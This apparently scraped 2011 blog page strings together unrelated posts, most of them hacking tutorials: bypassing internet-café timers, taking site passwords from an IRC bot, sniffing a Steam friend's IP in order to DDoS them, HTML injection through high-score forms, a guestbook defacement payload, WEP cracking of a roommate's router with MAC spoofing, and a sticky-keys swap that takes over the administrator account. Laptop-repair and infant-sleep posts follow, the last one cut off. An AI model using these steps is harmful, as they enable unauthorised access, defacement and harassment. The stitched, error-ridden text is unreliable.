How to get unlimited time in Internet Café's

Posted by Unknown On Friday, August 12, 2011 0 comments



Today we're going to learn how to disable the timer on the computers in Internet
Cafe's.
Let's go through the steps, shall we?
1. Create a New Text Document.
2. Then type CMD in it.
3. And then save it as anything.bat
(Make sure the file do NOT end on .txt, but on .bat)
4. Go to the location were you saved the .bat file and run it. If you've done this
correctly, you'll see that Command Prompt is open.
5. Now that Command Prompt is open, type in: cd\windows
(This will change the directory to Windows)
6. Then type in: regedit
(This will get you to the registry editor gui)
7. Now navigate to:
HKEY_CURRENT_USER>Appevents>software>classes>microsoft>windows>current
version>internet settings>policies>system
8. Then on the right pane where it says Disable Taskmanager, right click on it, and
scroll down to modify, and than change the value of it to "0".
9. And then open Windows Task Manager
(CTRL+ALT+DELETE)
10. And then disable the Internet Cafe's timer.
If you did this right, then you're done! Well done :D



Disclaimer: Please be of age (18) to view porn and/or try this exploit.
With this tutorial you can get much passes(famous sites) like:
Bangbros,Brazzers,realitykings,naughtyamerica etc etc.
Download mIRC here: http://www.mirc.com/get.html
Start mIRC you will get this screen:
Full name: Put a name that you want(hasbullah is not my name)
Email address: Put in a spam email that is not yours(people search emails through
mIRC to spam your inbox)
Nickname: Choose a nice nickname that you want
Alternative: Choose a second nickname if yours is already chosen and online by a
other person.
After go to the option Servers and choose add
Fill in this details:
Description: Porn channel(or whatever you like.
Irc server: Irc.Whatnet.org
Ports:6667
Group: Nothing
Password: Nothing
After adding you will see the server under your choosen description(mine
Irc.Whatnet.Org) Double click it then you will come back to the main screen and
press there Connect to Server
You will get this notification:
* Connecting to irc.whatnet.org (6667)
--
irc.whatnet.org- *** Looking up your hostname
--
irc.whatnet.org- *** Checking Ident
--
irc.whatnet.org- *** Found your hostname
And after this screen will pop-up
Fill in at Enter a Channel Name and click join:
3x
After joining you will get in a channel:
Click the XSS3,1 or 2 if you got in it will tell you this:
Welcome to #3x. Welcome to #3x. Search here for your pass before requesting in
main. Go slow: BOT ABUSE WILL GET YOU BANNED
If you got that message you are in the right room
Type: !search …… your site
like:
!search realitykings
Then the bot will automatically respond to you with a pass.



Step 1: Download the programs
CommView:
http://www.tamos.com/bitrix/redirect.php?
event1=download&event2=commview&event3=cv6&goto=/files/cv6.zip
"The tool used to sniff the IP through the Steam Client"
Steam Client :
http://storefront.steampowered.com/download/SteamInstall.msi
"If you don't have this you probably shouldn't even be doing this"
Step 2: Installation
Pretty self explanatory to be honest. Just install the Steam Client and CommView
(Two idiot proof installations)
Step 3: Getting the IP
Right click your Steam Client window at the bottom right of your screen and click
"Friends". Pick a friend who's IP you want.
Now, Open CommView. At the top you should see a little start sign. Click it. Now just
send a random message to your victim and start voice chat. Now a bunch of IP's will
show up on CommView. If Voice Chat is running you'll see the IN's and OUT's on
CommView will be rising through the roof. That is the ip. Right click it and click Copy,
then click Remote IP Address.
Step 4: Using that information
Now the easy part. Go to http://www.ip-adress.com/ip_tracer/ and put in the IP
address of your victim. Now you can either scare the shit out of him with that
information or DDoS him/her. Be Creative :)



Download firefox -> mozilla.org -> go addons.mozilla.com -> Search: Tamper Data
Download & install ..
Q: How do i find a website what i can "deface/change" via Tamper Data?
A: Think about online games. Where you can submit high scores.
Example:
www.littlecitygames.com/index.htm?play=leakypetesapt&gw=550&gh=400#game
On this game .. catch 1 or more drupples.. then make yourself game over, so you see
the next page:
Open Tamper Data and click: Start Tamper
Then on that page, fill in your name.. and click Submit High Score
Then Tamper Data will popup:
Click on Tamper , and the next will popup:
Copy everything what is in POST_DATA:
highScore=7&emailName=&nickName=darkcoke&score=7&fallSpeed=4&lives
=1&checkLives=true&bgMusic=%5Bobject+Object%5D&alrightSND=
%5Bobject+Object%5D&callmeSND=%5Bobject+Object%5D&heySND=%5Bobject
+Object%5D&leakypeteSND=%5Bobject+Object%5D&soggySND=%5Bobject
+Object%5D&YeehawSND=%5Bobject+Object%5D&dripSND=%5Bobject+Object
%5D&buttonSND=%5Bobject+Object%5D&splashSND=%5Bobject+Object
%5D&pbSND=%5Bobject+Object%5D&pipSqueekSND=%5Bobject+Object
%5D&soundFX=true&soundfxInt=false&music=false&musicInt=false&oldHi
ghScore=7
Then paste it in your favorite text editor.. like notepad here..
Then change highscore from 7 to 19000 for example, and nickName=darkcoke to
something with HTML like <body bgcolor="#0000FF"> (Blue background color)
PS: Change all highscore to the same .. so every 7 to 19000
Then you have something like this:
highScore=19000&emailName=&nickName=<body
bgcolor="#0000FF">&score=19000&fallSpeed=4&lives=1&checkLives=true
&bgMusic=%5Bobject+Object%5D&alrightSND=%5Bobject+Object
%5D&callmeSND=%5Bobject+Object%5D&heySND=%5Bobject+Object
%5D&leakypeteSND=%5Bobject+Object%5D&soggySND=%5Bobject+Object
%5D&YeehawSND=%5Bobject+Object%5D&dripSND=%5Bobject+Object
%5D&buttonSND=%5Bobject+Object%5D&splashSND=%5Bobject+Object
%5D&pbSND=%5Bobject+Object%5D&pipSqueekSND=%5Bobject+Object
%5D&soundFX=true&soundfxInt=false&music=false&musicInt=false&oldHi
ghScore=19000
Replace the content in the POST_DATA box (in tamper data) with the text what
we've changed and click ok, then a popup will come up:
Click OK. And keep click submit until the page is done with loading.. lets say : until you
see this:
You see my nickname darkc0ke , and the blue background :P
Q: Can I put my name after the 19000 ?
A: Sure , just put your name after nickName and paste the HTML in it..
like:
highScore=19000&emailName=&nickName=darkcoke<body
bgcolor="#0000FF">&score=19000&fallSpeed=4&lives=1&checkLives=true
&bgMusic=%5Bobject+Object%5D&alrightSND=%5Bobject+Object
%5D&callmeSND=%5Bobject+Object%5D&heySND=%5Bobject+Object
%5D&leakypeteSND=%5Bobject+Object%5D&soggySND=%5Bobject+Object
%5D&YeehawSND=%5Bobject+Object%5D&dripSND=%5Bobject+Object
%5D&buttonSND=%5Bobject+Object%5D&splashSND=%5Bobject+Object
%5D&pbSND=%5Bobject+Object%5D&pipSqueekSND=%5Bobject+Object
%5D&soundFX=true&soundfxInt=false&music=false&musicInt=false&oldHi
ghScore=19000
Some sites are a bit less secure, so maybe you can put your background in it ... but
you have to learn that HTML part by yourself.
Q: Is this possible to every site?
A: Almost everything , because the *highscore*.php file, have write permissions to
everyone (else people cant submit their score!) so you are allowed to write to their
document.
Happy "deface" :D



Go to google and search: guestbook.asp
When you find a guestbook, send in this as a comment:
< --- Inizio codice --- >
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<BODY bgColor=#000000>.
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Hacked By Your_nick</title>
<script>alert("Hacked By Your_nick - Italian Hackers")</script>
<style type="text/css">
<!--
.style1 {
font-size: 36px;
font-family: Arial, Helvetica, sans-serif;
color: #00FF00;
}
.style2 {font-size: 18px; font-family: Arial, Helvetica, sans-serif;
color: #ffffff; }
.style3 {font-size: 36px; font-family: Arial, Helvetica, sans-serif;
color: #000000; font-weight: bold; }
-->
</style>
</head>
<body>
<center><p class="style1"><img
src="http://www.baywoodracquetclub.com/images/warning.jpg" width="301"
height="268"></p>
</center>
<p align="center" class="style1"><strong>This Web Site contains bug -
HaCkEd By Your_Nick - Italian Hackers
</strong></p>
<p align="center" class="style3"><img
src="http://www.scuolepistoia.it/lsssalutati/Immagini/Formazione/Progetto
%20SOU%20(Spazio%20Orientamento%20Universitario).gif" width="204"
height="153"></p>
<p class="style1">&nbsp;</p>
<p class="style1">&nbsp;</p>
<p align="center" class="style2"><b>Site HaCkEd By Your_Nick</b></p>
<p class="style1">&nbsp;</p>
<p class="style1">&nbsp; </p>
</body>
</html>
< ---- Fine codice --- >

How To Crack WEP In Linux

Posted by Unknown On 0 comments



Im using Ubutnu 8.10, but all the commands are compatible with all other Linux Distros.
1. Open terminal
Sudo -s
(Enter Password)
apt-get install aircrack-ng (Here shows lots of cool shenanigans in verbose mood, just
enjoy)
Note: it might prompt you with something like "this file will take 8995kb.. do u wish
to install [Y/N]" (Correct Answer Being Y for yes)
Alright, you have just installed aircrack-ng on your computer, congratulations!
2. Ifconfig wlan0 down
this command puts your wireless card into "monitor mode." if this line doesnt work
for you, try "ifconfig ath0 down" or the connection type you are using. im going to
continue using wlan0 as that applies to me, you will just replace wlan0 with your
specific device code.
OR iwconfig wlan0 mode monitor if neither of the above work for you. once again,
depends on your computer.
3. Your goal now is to find your target, my goal is my roommates wireless router which
is using WEP encryption, how convenient!
first, for educational purposes, type airodump-ng into terminal, this shows all the
commands airodump is capable of, very important if you want to go after something a
tad different or specific
We want to find the target, type airodump-ng --showack wlan0
We see that the target Essid is "Rob and Big" the encryption type is WEP, the
BSSID number is "00:22:15:23:6E:E2", and finally the channel number is 11
you must know the enemy well if you want to hack it successfully.
know that we know all this very important information, we shall begin our attack!
airodump-ng -w First --showack --berlin 3000 --bssid 00:22:15:23:6E:E2 -C 11 wlan0
holy shnap! that was alot!, here is what we just did.
-w ->saves all the important stuff to a file (first being the file name)
--showack ->shows some cool information, idk, i like it just cause its always changing,
not really necessary
--berlin 3000 -> keeps the cool numbers on the screen even longer, like i said, not
totally important, but defiantly looks cool! (3000 being the time the numbers are kept
on the screen)
--bssid ->defines to the program what bssid (the router) you want to specifically
capture packets from
-C -> Defines what channel the program to stay on (instead of surfing all 12, it just
monitors one now)
wow! amazing, tons of cool numbers pop up and entertain us! whooo hooo!
what is actually happening is that the program is capturing packets and saving them to
the file you defined above (First)
so break out a can of chef boyardee and chow away, cause its going to be awhile.
You are actually wanting for the number under #Data at the time to reach ~ 10000
to 100000, the more data is being transfered over the network, the faster this will
go.
---
Dude! that number is not going up very fast / or, very very very slow!
Skip to the bottom, i will explain and how to 'fix that'
--
Fantastic! you have ~ 10000 packets and a full stomach, what now?
you have all this information, now you need to decipher it (more commonly know as
'cracking')
KEEP THE AIRODUMP-NG TERMINAL OPEN!
open a new terminal and type
sudo -s
(enter password)
aircrack-ng -a 1 -b 00:22:15:23:6E:E2 First.cab
Cool! what did i just do?
aircrack-ng -> cracking program, can crack WEP and WPA passcodes
-a -> Set the attack mode to WEP (2 is WPA)
-b -> is the network we are attacking (the bssid is 00:22:15:23:6E:E2)
First.cab -> the file airodump saved all the important shenagians to. (note, the
program automatically saves the file as *.cab file)
wait..
wait..
wait..
BAM! the password! Congratulations, you have just won the game.
or
plz collect 5000 more packets, (this is why you left airodump-ng open.) aircrack-ng
will automatically re-attempt to crack again after airodump-ng has collected 5000
more packets. so more chef boyardee, and some more patience...
---
#Data is going slooowwwwwwwww!!! HELP ME!
this is because the user is not actively using the network, you have a choice, wait till
he starts using the network again or 'assist' the network on giving you the packets
you need.
now, this is going to be quite a hassel, but stick with it.
apt-get install macchanger
stop the airodump-ng from working. (i just hit ctrl+c and it stops)
ifconfig wlan0 down
>> the top half of the screen of the terminal of the airodump tell you the network you
are gathering packets for, the bottom half lists mac addresses. important!
with the picture above, im going to use the mac address 00:22:3F:7B:D5:2C
so, macchanger -m 00:22:3F:7B:D5:2C wlan0
Now, your mac address is the same as a computer already accepted by the router!
oooo... awwwww..
now, we get to play with a program called aireplay-ng!
aireplay-ng -3 -b 00:22:15:23:6E:E2 -h 00:22:3F:7B:D5:2C wlan0
--What just happened?
aireplay-ng works buy injecting packets into the router so u get more traffic btwn
the computers. (speeds up the packet retrieval on the airodump-ng side)
-3 is the attack type '00:22:3F:7B:D5:2C' i just explained what i did above
-b is the enemy bssid '00:22:15:23:6E:E2'
-h is your spoofed (faked) mac addresss '00:22:3F:7B:D5:2C'
now, it will start injecting packets.. now start up airodump again and wait some more!
airodump-ng -w First --showack --berlin 3000 --bssid 00:22:15:23:6E:E2 -C 11 wlan0
(just in case you lost it)
WOW! that, is how to crack a WEP key. i hoped you enjoyed this tut.



First you can only use this method to crack a WEP encrypted network. WEP has been
replaced by WPA encryption which is stronger but can still be cracked, just not as
easily. To find out if the network you want to crack is WEP encryption, simply view
the wireless networks in the Connect to a network box and hold your mouse over the
network of choice. A little box will tell you the encryption. If it say WEP - good we
can proceed, if it says anything else this tutorial wont help.
First to understand what you will be doing. You will be using a program to capture
packets and then use another program to analyze those packets and crack the key,
thus allowing you to have access to their network. To capture packets (data from the
network we are trying to crack) you must have the program running on your computer
and you must capture about 200 000 or more IV packets (a special type of packet). I
will show you how to capture the correct type of packets.
Also ONLY certain types of wireless cards can actually capture wireless packets. In
order to capture packets your wireless card must be able to go into monitor mode,
not every driver or every wireless card supports monitor mode. In most cases you will
have to download a special driver designed for your wireless card to put it into
monitor mode. I had to purchase a new wireless card because mine was not supported.
The program you will be using has a list of supported wireless cards and comes with
the drivers needed (Lucky you)
Ok, down to business. First the program you need to capture packets can be
downloaded from this link http://www.tamos.com/download/main/ca.php
Next the program to analyze the packets and finger out the password can be
downloaded from my own site. I got it to work for windows vista and then zipped it all
into a folder for you. To get this to run all you have to do is extract it, open the
aircrack folder, then open the bin folder, then double click on Aircrack-ng GUI.exe.
Here is the download linkhttp://www.howtovideos.ca/images/aircrackVista.rar just
click it and save the file.
Now for the dirty work, keep in mind this could take a few days to capture enough
packets. First install the Commview for Wifi program. You do this by extracting the
setup file from the file we downloaded earlier (ca6.zip) Then double click setup.exe
and follow the prompts. When Commview opens for the first time it has a driver
installations guide. This replaces the old driver with a newer, better, and more
improved version! Hooray. Follow the prompts to install your new driver and now we
are ready to capture. If everything has gone as planned when you open Commview for
Wifi the little play button in the top left corner will be blue. If it is not blue the
driver has not been installed properly. Moving on…
Click the blue button in the top left corner and then click Start Scanning. Commview
for Wifi now starts scanning each channel looking for data that is being sent. It will
list each network it finds. Now click each host until you find the name of the network
key you are trying to find. Now select the appropriate channel (my network is
broadcasting on channel 6 so I will start capturing all data on channel 6) Click
capture.
Commview for Wifi is now capturing all the packets being sent over channel 6. Once
Commview for Wifi collects enough packets aircrack can analyze them and crack the
wireless key. The thing is, you only need certain packets, and if you collect too many
unneeded packets aircrack may get confused. To help make things easier follow the
next few steps.
First of all we only want packets from one host, not all of them. As you can see from
my screenshot below I am collecting packets from 7 different network. (see
screenshot below)A few are WPA encrypted so they and a few are WEP. I really only
want to collect data being sent from one network, so in order to do this all you have
to do is right click on the wireless network you want to crack and select copy mac
address.
Now click on the rules tab. On the left side under simple rules click MAC Addresses.
For action select Capture, and for Add Record select both. Now click inside the entry
form box and hit ctrl+v (to paste the mac address) or right click and select paste.
Now hit add MAC Address.
What we just did is make a rule so that Commview for Wifi will only capture packets
coming from a certain MAC Address (the one we want) Great almost done.
Now to make things even easier for Aircrack you only want to capture DATA packets.
There are 3 types to select from Management packets, Data Packets and Control
Packets. We only want Data packets because that is where the information is that
Aircrack needs to crack the wireless encryption passkey. Simply select the D, and
unselect the M and the C.
Now Commview for Wifi is only capturing Data Packets. To be more specific
Commview for Wifi is only capturing Data Packets to and from a specific MAC
address. Now that everything is set up to capture the right types of packets we
should start saving the logs.
You have to save all of the packets into a log for Aircrack to analyze them. You can
set Commview for Wifi to save them automatically, or just save them yourself
periodically. It is a good idea to have them auto save because it splits them into nicely
sized logs, and if you accidentally close Commview for Wifi they will save and you
wont lose all your packets! To do that just go to the logging tab and enable auto
saving. You can change the settings if you would like (I recommend increasing the
maximum directory size to something like 100000).
And now we wait… We have to capture over 15000 IV packets. Because we set up
some rules most of the packets we capture will be IV packets (these are a certain
type of Data packet with information used to crack the wireless key). It took me
about 4 days to capture enough packets, but I was not running Commview for Wifi non
stop. If you are close to the network and there is heavy traffic, it may only take you
a few hours. Ok what do you do now?
Alright, so now 20000 packets (or more) later we are ready to crack the WEP
wireless key. First lets converts all of the log files to .cap format (shown in
screenshot below) When I cracked my first WEP key with this method I had 4 log
files and about 220 000 packets.Go to wherever you have your log files saved and
double click to open it. Now click on file -> Export Logs -> Tcpdump Format
Save it as 1.cap do the rest of your logs, saving them in sequential order 1.cap, 2.cap,
3.cap etc.
Now that you have all of your log files saved in .cap format lets open Aircrack. Open
the aircrack folder (wherever you extracted it) then open the Bin folder, now double
click Aircrack-ng GUI.exe. Aircrack will open, click the choose button and navigate to
where you have your log files saved. To select all of your log files ( saved in .cap
format) Hold down CTRL and click each file, Then hit open.
Now click launch, Aircrack shows you all of the different BSSID’s that it captured
data from and assigns an index number to each one, then it asks you Index number of
target network? You want to enter the number of the network you want to crack.
Mine is called CrackMePlease so I am selecting 15.
Enter the index number and then press enter, if you have enough IV’s then it should
give you the WEP key. If not go back and capture more and try again.
That’s all



(The only way this is going to work is if your account has permission to mody files in folder
«system32»)
Ever wanted to hack your college pc with guest account/student account so that you
can download with full speed Hack Administrator !!!!there ? or just wanted to hack
your friend’s pc to make him gawk when you tell your success story of hacking ?
well,there is a great way of hacking an administrator account from a guest account by
which you can reset the administrator password and getting all the privilages an
administrator enjoys on windows.. Interested ? read on…
Concept
Press shift key 5 times and the sticky key dialog shows up.This works even at the
logon screen. But If we replace the sethc.exe which is responsible for the sticky key
dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon
screen,we will get a command prompt with administrator privilages because no user
has logged on. From there we can hack the administrator password,even from a guest
account.
Prerequisites
Guest account with write access to system 32.
Here is how to do that -
* Go to C:/windows/system32
* Copy cmd.exe and paste it on desktop
* rename cmd.exe to sethc.exe
* Copy the new sethc.exe to system 32,when windows asks for overwriting the
file,then click yes.
When asked to overwrite, overwrite the sethc.exe.
* Now Log out from your guest account and at the user select window,press shift key
5 times.
* Instead of Sticky Key confirmation dialog,command prompt with full administrator
privileges will open.
Press shift key 5 times and command prompt will open.
* Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password
you like and press enter.
* You will see “ The Command completed successfully” and then exit the command
prompt and login into administrator with your new password.
* Congrats You have hacked admin from guest account.
Further..
Also, you can further create a new user at the command prompt by typing “NET USER
Ephemeral /ADD” where “Ephemeral” is the username you would like to add with
administrator privileges. Then hide your newly created admin account by -
Go to registry editor and navigate to this key
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
Here create a new DWORD value, write its name as the “user name” that u created
for your admin account and live with your admin account forever :)

How To Close Ports

Posted by Unknown On 0 comments



So i've been looking for a while on just how to close a port on a computer. I simply
couldn't find a way. Well, i finally found it. This'll only work for windows users (unless
your unix version OS has netsh).
it's actually quite simple. here's the command for it:
netsh firewall delete portopening TCP portnumber
it's that simple. Simply go to START -> RUN -> and type in that command up there,
and it'll close it for you.
or, you can also open up command prompt (START -> RUN -> CMD) and type in "netsh"
without the quotes to get to your windows firewall settings.
however, since i'm such a nice guy, i wrote it all out in a vbs script for you so that it's
automatically runable. as well as a batch script. so here you are fellas:
.VBS Script
set ss = createobject("wscript.shell")
set ws = wscript
dim PORT
PORT = InputBox("Enter the port you wish to close:")
ss.run "netsh.exe"
ws.sleep 1000
ss.sendkeys "firewall delete portopening TCP " & PORT
ss.sendkeys "{enter}"
ws.sleep 500
'ss.sendkeys "exit"
'ss.sendkeys "{enter}"
.BAT Script
@echo off
title Port Closer
echo Port Closer
echo.
set /p port=Type the port number you wish to close here:
netsh firewall delete portopening TCP %port%
msg /w * Port %port% has been closed.
exit





1) All you need is your friend's IP Address and your Command Prompt.
2) Open Notepad and write this code as it is.....!
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
3) Now save this as "Messenger.Bat".
4) Open Command Prompt.
5) Drag this file (.bat file) over to Command Prompt and press Enter.
6) You would then see something like this:
7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:
8) Now all you need to do is type your message and press Enter.
Start Chatting.......!






Step 1: Have the Folder you want to put the background on open!
Step 2: Open up Notepad, then simply paste in this code:
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
iconarea_image=***Picture Location Here!***\***Name of File!***
Step 3: Go to ur picture (the picture you want to use!) and right click and select
properties and find the file location for example lets say my file is in "my hardrive" it
would be located at "C:\\" understand? copy the location!
Step 4: Now go back to ur text document (notepad) and where it says ***Picture
Location Here!*** paste the location...u copied in the previus step!
Step 5: Now after u've done that where it says ***Name of File!*** type the name
of the file including the .jpg .bmp .bip. jpeg etc
Step 6: Save the text document as "desktop.ini" be sure to remember the .ini
extension! click Save as "All Files" not "Text Document" and save the document in the
folder where u want the background to be!
Now just close the folder and open it again it should show the picture as a
background!

CHARGING PROBLEM IN LAPTOP

Posted by Unknown On 0 comments





there is a lot of problem facing by user and a chip level technical .



one of them is laptop shuts down every time charger plugged in. Charging only works if connected before turning on laptop even A/C adopter is OK.

This problem happens because of laptop charging circuit failure and it is not
an easy job to diagnose problem on laptop motherboard.
This problem happened because of switching Mosfet or Op amp IC failure.
But remember before you take any chip-level action plz check laptop with another good adapter.
Now i m going to show you how you can fix this problem on hp dv3000 series,it is very simple way just replace component for 100% solution if you didn't fix after resold following pitcher.




Yes, the fan, if plugged into the headers on the Motherboard, should be spinning. Even PWM controlled fans spin unless you manually disable them.

What kind of Laptop do you have? Usually, there's more than 1 fan header in Desktop Motherboard and You can always plug in the fan into a different fan header on the Motherboard to test the fan. but on Laptop motherboard there is only one header socket.
The one that is labeled CPU fan is to monitor and control it through the bios. If you fan isn't spinning when you boot up your Laptop, go into the bios, manually override the fan setting to spin at 100% all the time. If it doesn't spin, then there's a problem. Either your fan or the fan controller PWM circuit on the motherboard.

basically CPU fan has three to four pin connector/jack and different color wire.
fan connector placement is shown in the figures below:

Pin #Signal FunctionWire Color
1CPU Fan PWMGreen
2CPU Fan InYellow
3CPU Fan PowerRed
4GroundBlack

PinNameColor
1GNDblack
2+5VDCyellow
3Sensegreen
4Controlblue
CPU fans may use it 3-pin or 4-pin power connectors. 3-pin connectors are usually used for the smaller fans with lower power consumption and 4-pin connectors are usually used by CPU fans with higher power consumption. Fans and on-board fan headers are backwards compatible.
if now your fan not spinning even if it is proper plugged in on laptop motherboard, and your bios is fine
then first of all you should have to check fan with a 5v battery or you can use little high voltage battery like 9v but at this time don't connect fan with battery for a long time, that can damage fan.
to check a CPU fan with a battery just leave sensor pin free(no connected) and connect it's positive terminal with battery +ve point and GUN pin of fan connect with -ve of battery shown in the figures below if Fan start spinning that means CPU fan is ok now the problem has in your laptops motherboard




checking Laptop CPU Cooling Fan using a external battery





If you have a working fan and it is properly connected with laptop motherboard and by bad luck it's not spinning as usual.
First of all try to update laptop BIOS and if still nothing fixed then come down to CHIP LEVEL treatment of laptop. Now only two thing you can do to make laptop again working.

1.Check +voltage and senser track from fan connector, find out the CPU fan PWM controller circuit, cpu fan supply comes from output section of fan PWM circuit and this circuit not a smmiliar kind for all laptops and notebooks basically +5 voltage required on Vcc pin to spinning fan and to find out Vcc pin of CPU fan read my previous post noCPU COOLING FAN NOT WORKING
check cpu fan controller circuit and it's all fusible resistor or small coil in circuit with a simple OME meter or continuity meter coil and fuse should be show zero continuity on there surface and if no continuity , found open component then you can bypass them using a unshielded Cooper wire.sure it will work again if other things are OK
and unfortunately no any coil and fuse you found on fan controller section then just resold this section using hot air-gun and check other components of fan PWM circuit if possible at your own way :)

2.now you try all you best and still have same problem then now a good news for you because we can power up laptop notebook cpu fan Directly without using PWM controller circuit..
just found out the +5v track on motherboard nearby fan supply track ,connect the fan Vcc pin with +5v track using shielded thin wire jumper on motherboard and some time you can make your fan alive as just remove only the sence pin of fan from it's connector if + five volt is already coming on the power pin of fan.
..now your fan will start working but it will start spinning in a same speed non stop till the laptop is on. but doing this thing please confirm that which supply given to fan directly by jumper that will be generated after you turned on laptop.
have a good luck :)

How do I Prevent Sleep Problems?

Posted by Unknown On Wednesday, August 10, 2011 0 comments


Newborns

  • Place your baby in the crib when he is drowsy but awake. This step is very important. Without it, the other preventive measures will fail. Your baby's last waking memory should be of the crib, not of you or of being fed. He must learn to put himself to sleep without you. Don't expect him to go to sleep as soon as you lay him down. It often takes 20 minutes of restlessness for a baby to go to sleep. If he is crying, rock him and cuddle him. But when he settles down, try to place him in the crib before he falls asleep. Handle naps in the same way. This is how your child will learn to put himself back to sleep after normal awakenings. Don't help your infant when he doesn't need any help. (Note: The sleep position recommended by the American Academy of Pediatrics for healthy infants is on the back.)

  • Hold or comfort your baby for all fussy crying during the first 3 months. All new babies cry some during the day and night. If your baby cries excessively, the cause is probably colic. Always respond to a crying baby. Gentle rocking and cuddling seem to help the most. Babies can't be spoiled during the first 3 or 4 months of life. But even colicky babies have a few times each day when they are drowsy and not crying. On these occasions, place your child in the crib and let him learn to comfort himself and put himself to sleep.

  • Do not let your baby sleep for more than 3 consecutive hours during the day. Try to awaken him gently and entertain him. In this way, the time when your infant sleeps the longest will occur during the night. (Note: Many newborns can sleep 5 consecutive hours and you can teach them to sleep for this longer period at night.)

  • Keep daytime feeding intervals to at least 2 hours for newborns. More frequent daytime feedings (such as hourly) lead to frequent awakenings for small feedings at night.  Crying is the only form of communication newborns have. Crying does not always mean your baby is hungry. He may be tired, bored, lonely, or too hot. Hold your baby at these times or put him to bed. Don't let feeding become a pacifier. For every time you nurse your baby, there should be 4 or 5 times that you snuggle your baby without nursing. Don't let him get into the bad habit of eating every time you hold him. That's called grazing.

  • Make middle-of-the-night feedings brief and boring.  You want your baby to think of nighttime as a special time for sleeping. When he awakens at night for feedings, don't turn on the lights, talk to him, or rock him. Feed him quickly and quietly. Provide extra rocking and playtime during the day. This approach will lead to longer periods of sleep at night.

  • Don't awaken your infant to change diapers during the night.  The exceptions to this rule are diapers soiled with bowel movements or times when you are treating a bad diaper rash. If you must change your child, use as little light as possible (for example, a flashlight), do it quietly, and don't provide any entertainment.

  • Don't let your baby sleep in your bed. Once your baby is used to sleeping with you, a move to his own bed will be extremely difficult. While it's not harmful for your child to sleep with you, you probably won't get a restful night's sleep. So why not teach your child to prefer his own bed? For the first 2 or 3 months, you can keep your baby in a crib or bassinet next to your bed.

  • Give the last feeding at your bedtime (10 or 11 PM).  Try to keep your baby awake for the 2 hours before this last feeding. Going to bed at the same time every night helps your baby develop good sleeping habits.

2-Month-Old Babies

  • Move your baby's crib to a separate room. By 3 months of age, your baby should be sleeping in a separate room. This will help parents who are light sleepers sleep better. Also, your baby may forget that her parents are available if she can't see them when she awakens. If separate rooms are impractical, at least put up a screen or cover the crib railing with a blanket so that your baby cannot see your bed.

  • Try to delay middle-of-the-night feedings. By now, your baby should be down to one feeding during the night (2 for some breast-fed babies). Before preparing a bottle, try holding your baby briefly to see if that will satisfy her. Never awaken your baby at night for a feeding except at your bedtime.

4-Month-Old Babies

  • Try to discontinue the 2 AM feeding before it becomes a habit.  By 4 months of age, your bottle-fed baby does not need to be fed more than four times a day. Breast-fed babies do not need more than 5 or 6 nursing sessions a day. If you do not eliminate the night feedings by 6 months of age, they will become more difficult to stop as your child gets older. Remember to give the last feeding at 10 or 11 PM. If your child cries during the night, comfort him with a back rub and some soothing words instead of with a feeding.  Note: Some breast-fed babies will continue to need to be nursed once during the night.

  • Don't allow your baby to hold his bottle or take it to bed with him. Babies should think that the bottle belongs to the parents. A bottle in bed leads to middle-of-the-night crying because your baby will inevitably reach for the bottle and find it empty or on the floor.

  • Make any middle-of-the-night contacts brief and boring. All children have 4 or 5 partial awakenings each night. They need to learn how to go back to sleep on their own at these times. If your baby cries for more than a few minutes, visit him but don't turn on the light, play with him, or take him out of his crib. Comfort him with a few soothing words and stay for less than 1 minute. If your child is standing in the crib, don't try to make him lie down. He can do this himself. If the crying continues for more than 10 minutes, calm him and stay in the room until he goes to sleep. (Exceptions: You feel your baby is sick, hungry, or afraid.)

6-Month-Old Babies

  • Provide a friendly soft toy for your child to hold in her crib. At the age of 6 months, children start to be anxious about separation from their parents. A stuffed animal, doll, or blanket can be a security object that will give comfort to your child when she wakes up during the night.

  • Leave the door open to your child's room. Children can become frightened when they are in a closed space and are not sure that their parents are still nearby.

  • During the day, respond to separation fears by holding and reassuring your child. This lessens nighttime fears and is especially important for mothers who work outside the home.

  • For middle-of-the-night fears, make contacts prompt and reassuring. For mild nighttime fears, check on your child promptly and be reassuring, but keep the interaction as brief as possible. If your child panics when you leave, or vomits with crying, stay in your child's room until she is either calm or goes to sleep. Do not take her out of the crib, but provide whatever else she needs for comfort, keeping the light off and not talking too much. At most, sit next to the crib with your hand on her. These measures will calm even a severely upset infant.

1-Year-Old Children

  • Establish a pleasant and predictable bedtime ritual. Bedtime rituals, which can start in the early months, become very important to a child by 1 year of age. Children need a familiar routine. Both parents can be involved at bedtime, taking turns with reading or making up stories. Both parents should kiss and hug the child "goodnight." Make sure that your child's security objects are nearby. Finish the bedtime ritual before your child falls asleep.

  • Once put to bed, your child should stay there. Some older infants have temper tantrums at bedtime. They may protest about bedtime or even refuse to lie down. You should ignore these protests and leave the room. You can ignore any ongoing questions or demands your child makes and enforce the rule that your child can't leave the bedroom. If your child comes out, return him quickly to the bedroom and avoid any conversation. If you respond to his protests in this way every time, he will learn not to try to prolong bedtime.

  • If your child has nightmares or bedtime fears, reassure him. Never ignore your child's fears or punish him for having fears. Everyone has 4 or 5 dreams a night. Some of these are bad dreams. If nightmares become frequent, try to determine what might be causing them, such as something your child might have seen on TV.

  • Don't worry about the amount of sleep your child is getting. Different people need different amounts of sleep at different ages. The best way you can know that your child is getting enough sleep is that he is not tired during the day. Naps are important to young children but keep them less than 2 hours long. Children stop having morning naps between 18 months and 2 years of age and give up their afternoon naps between 3 and 6 years of age.


  1. 1
    Maintain a healthy lifestyle such as eating well, drinking water regularly, avoiding stress and maintaining a healthy weight. Frequently, individuals develop sleep disorders due to stress or obesity.
  2. 2
    Establish a regular schedule for sleep. Wake up and go to bed at the same time everyday, including weekends. Establishing a regular sleep schedule will train your body to sleep soundly on a consistent basis.
  3. 3
    Avoid taking naps throughout the day. If you take a nap during the day, then you will be less tired at night, be more restless and may not sleep as deeply.
  4. 4
